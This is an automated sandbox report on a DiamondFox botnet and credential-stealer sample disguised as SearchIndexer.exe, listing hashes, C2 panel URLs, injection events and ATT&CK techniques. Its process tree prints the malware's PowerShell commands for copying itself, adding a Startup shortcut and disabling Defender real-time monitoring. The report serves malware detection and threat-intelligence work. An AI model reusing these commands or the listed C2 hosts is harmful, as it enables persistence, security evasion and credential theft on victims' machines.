diamondfox | b8fda370e83bf776a2f4c4a23f5d701186e21984f771e878f04fe0136faf1fbf

Analysis

max time kernel
147s
max time network
105s
platform
windows7_x64
resource
win7v200722
submitted
23/07/2020, 12:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SearchIndexer.exe
Size

91KB
MD5

1cc07a0274718e845c9b77f8334c4cb3
SHA1

12b6c08371fd4661ed2da442e7ec34f226d7ac01
SHA256

b8fda370e83bf776a2f4c4a23f5d701186e21984f771e878f04fe0136faf1fbf
SHA512

0bb60c3a608a6227cfe66f264b2fcdc932e9c9f8f72ff8f8569f23400b6563b8cd834deae1fe4f3866dbef003bbc25372481d6ca8edfcd2467c16a35aa4dfb9d

Score

10^/10

diamondfox botnet spyware stealer

Malware Config

Extracted

Family

diamondfox

http://timesync.live/panel/gate.php

http://cartierxs.bit/panel/gate.php

http://salamsa.bit/panel/gate.php

http://rockababy.bit/panel/gate.php

http://minon.bit/panel/gate.php

http://bloxfox.bit/panel/gate.php

http://ggbbee.bit/panel/gate.php

http://locksock.bit/panel/gate.php

http://misosoup.bit/panel/gate.php

http://opseckes.bit/panel/gate.php

http://googletabmanager.com/panel/gate.php

Mutex

cyjJzYyDay1EfrkaW4HRyO6y4OufUKaS

xor.plain

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 11 IoCs

Detects DiamondFox payload in file/memory.

resource	yara_rule
behavioral1/files/0x000500000001318f-5.dat	diamondfox
behavioral1/memory/1468-6-0x0000000006260000-0x0000000006270000-memory.dmp	diamondfox
behavioral1/files/0x000500000001318f-7.dat	diamondfox
behavioral1/files/0x000500000001318f-10.dat	diamondfox
behavioral1/files/0x000500000001318f-27.dat	diamondfox
behavioral1/files/0x000500000001318f-28.dat	diamondfox
behavioral1/files/0x000500000001318f-35.dat	diamondfox
behavioral1/files/0x000500000001318f-40.dat	diamondfox
behavioral1/files/0x000500000001318f-45.dat	diamondfox
behavioral1/files/0x000500000001318f-49.dat	diamondfox
behavioral1/files/0x000500000001318f-53.dat	diamondfox

Executes dropped EXE 6 IoCs

pid	Process
1828	SearchIndexer.exe
1348	SearchIndexer.exe
1240	SearchIndexer.exe
1888	SearchIndexer.exe
1640	SearchIndexer.exe
1588	SearchIndexer.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SearchIndexer.lnk	powershell.exe

Loads dropped DLL 3 IoCs

pid	Process
1468	powershell.exe
1468	powershell.exe
1564	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1828 set thread context of 1348	1828	SearchIndexer.exe	35
PID 1828 set thread context of 1240	1828	SearchIndexer.exe	36
PID 1828 set thread context of 1888	1828	SearchIndexer.exe	38
PID 1828 set thread context of 1640	1828	SearchIndexer.exe	39
PID 1828 set thread context of 1588	1828	SearchIndexer.exe	40

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1468	powershell.exe
1468	powershell.exe
1564	powershell.exe
1564	powershell.exe
832	Powershell.exe
832	Powershell.exe
1240	SearchIndexer.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	832	Powershell.exe
Token: SeDebugPrivilege	1888	SearchIndexer.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1420	SearchIndexer.exe
1828	SearchIndexer.exe
1588	SearchIndexer.exe

Suspicious use of WriteProcessMemory 68 IoCs

description	pid	Process	procid_target
PID 1420 wrote to memory of 1468	1420	SearchIndexer.exe	24
PID 1420 wrote to memory of 1468	1420	SearchIndexer.exe	24
PID 1420 wrote to memory of 1468	1420	SearchIndexer.exe	24
PID 1420 wrote to memory of 1468	1420	SearchIndexer.exe	24
PID 1468 wrote to memory of 1828	1468	powershell.exe	28
PID 1468 wrote to memory of 1828	1468	powershell.exe	28
PID 1468 wrote to memory of 1828	1468	powershell.exe	28
PID 1468 wrote to memory of 1828	1468	powershell.exe	28
PID 1828 wrote to memory of 1564	1828	SearchIndexer.exe	29
PID 1828 wrote to memory of 1564	1828	SearchIndexer.exe	29
PID 1828 wrote to memory of 1564	1828	SearchIndexer.exe	29
PID 1828 wrote to memory of 1564	1828	SearchIndexer.exe	29
PID 1828 wrote to memory of 832	1828	SearchIndexer.exe	32
PID 1828 wrote to memory of 832	1828	SearchIndexer.exe	32
PID 1828 wrote to memory of 832	1828	SearchIndexer.exe	32
PID 1828 wrote to memory of 832	1828	SearchIndexer.exe	32
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1348	1828	SearchIndexer.exe	35
PID 1828 wrote to memory of 1240	1828	SearchIndexer.exe	36
PID 1828 wrote to memory of 1240	1828	SearchIndexer.exe	36
PID 1828 wrote to memory of 1240	1828	SearchIndexer.exe	36
PID 1828 wrote to memory of 1240	1828	SearchIndexer.exe	36
PID 1828 wrote to memory of 1240	1828	SearchIndexer.exe	36
PID 1828 wrote to memory of 1240	1828	SearchIndexer.exe	36
PID 1828 wrote to memory of 1240	1828	SearchIndexer.exe	36
PID 1828 wrote to memory of 1240	1828	SearchIndexer.exe	36
PID 1828 wrote to memory of 1240	1828	SearchIndexer.exe	36
PID 1828 wrote to memory of 1240	1828	SearchIndexer.exe	36
PID 1828 wrote to memory of 1888	1828	SearchIndexer.exe	38
PID 1828 wrote to memory of 1888	1828	SearchIndexer.exe	38
PID 1828 wrote to memory of 1888	1828	SearchIndexer.exe	38
PID 1828 wrote to memory of 1888	1828	SearchIndexer.exe	38
PID 1828 wrote to memory of 1888	1828	SearchIndexer.exe	38
PID 1828 wrote to memory of 1888	1828	SearchIndexer.exe	38
PID 1828 wrote to memory of 1888	1828	SearchIndexer.exe	38
PID 1828 wrote to memory of 1888	1828	SearchIndexer.exe	38
PID 1828 wrote to memory of 1888	1828	SearchIndexer.exe	38
PID 1828 wrote to memory of 1888	1828	SearchIndexer.exe	38
PID 1828 wrote to memory of 1640	1828	SearchIndexer.exe	39
PID 1828 wrote to memory of 1640	1828	SearchIndexer.exe	39
PID 1828 wrote to memory of 1640	1828	SearchIndexer.exe	39
PID 1828 wrote to memory of 1640	1828	SearchIndexer.exe	39
PID 1828 wrote to memory of 1640	1828	SearchIndexer.exe	39
PID 1828 wrote to memory of 1640	1828	SearchIndexer.exe	39
PID 1828 wrote to memory of 1640	1828	SearchIndexer.exe	39
PID 1828 wrote to memory of 1640	1828	SearchIndexer.exe	39
PID 1828 wrote to memory of 1640	1828	SearchIndexer.exe	39
PID 1828 wrote to memory of 1640	1828	SearchIndexer.exe	39
PID 1828 wrote to memory of 1588	1828	SearchIndexer.exe	40
PID 1828 wrote to memory of 1588	1828	SearchIndexer.exe	40
PID 1828 wrote to memory of 1588	1828	SearchIndexer.exe	40
PID 1828 wrote to memory of 1588	1828	SearchIndexer.exe	40
PID 1828 wrote to memory of 1588	1828	SearchIndexer.exe	40
PID 1828 wrote to memory of 1588	1828	SearchIndexer.exe	40
PID 1828 wrote to memory of 1588	1828	SearchIndexer.exe	40
PID 1828 wrote to memory of 1588	1828	SearchIndexer.exe	40
PID 1828 wrote to memory of 1588	1828	SearchIndexer.exe	40

C:\Users\Admin\AppData\Local\Temp\SearchIndexer.exe
"C:\Users\Admin\AppData\Local\Temp\SearchIndexer.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1420
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell Copy-Item -Path 'C:\Users\Admin\AppData\Local\Temp\SearchIndexer.exe' -Destination 'C:\Users\Admin\AppData\Local\xerasr\SearchIndexer.exe';Start-Sleep -s 60;Start-Process 'C:\Users\Admin\AppData\Local\xerasr\SearchIndexer.exe'
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Users\Admin\AppData\Local\xerasr\SearchIndexer.exe
    "C:\Users\Admin\AppData\Local\xerasr\SearchIndexer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1828
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell $shell = New-Object -ComObject WScript.Shell;$shortcut = $shell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SearchIndexer.lnk');$shortcut.TargetPath = 'C:\Users\Admin\AppData\Local\xerasr\SearchIndexer.exe';$shortcut.Save()
      4⤵
      Drops startup file
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
      Powershell Set-MpPreference -DisableRealtimeMonitoring 1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:832
  - - C:\Users\Admin\AppData\Local\xerasr\SearchIndexer.exe
      4⤵
      Executes dropped EXE
      PID:1348
  - - C:\Users\Admin\AppData\Local\xerasr\SearchIndexer.exe
      /scomma C:\Users\Admin\AppData\Local\xerasr\1.log
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1240
  - - C:\Users\Admin\AppData\Local\xerasr\SearchIndexer.exe
      /scomma C:\Users\Admin\AppData\Local\xerasr\2.log
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1888
  - - C:\Users\Admin\AppData\Local\xerasr\SearchIndexer.exe
      /scomma C:\Users\Admin\AppData\Local\xerasr\3.log
      4⤵
      Executes dropped EXE
      PID:1640
  - - C:\Users\Admin\AppData\Local\xerasr\SearchIndexer.exe
      /scomma C:\Users\Admin\AppData\Local\xerasr\4.log
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1588

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1240-38-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1240-41-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1348-36-0x0000000000400000-0x000000000044B000-memory.dmp

Filesize
300KB

Download
memory/1348-33-0x0000000000400000-0x000000000044B000-memory.dmp

Filesize
300KB

Download
memory/1348-37-0x0000000000360000-0x0000000000393000-memory.dmp

Filesize
204KB

Download
memory/1468-6-0x0000000006260000-0x0000000006270000-memory.dmp

Filesize
64KB

Download
memory/1588-51-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1588-55-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1588-54-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1640-47-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/1640-50-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/1888-46-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1888-43-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download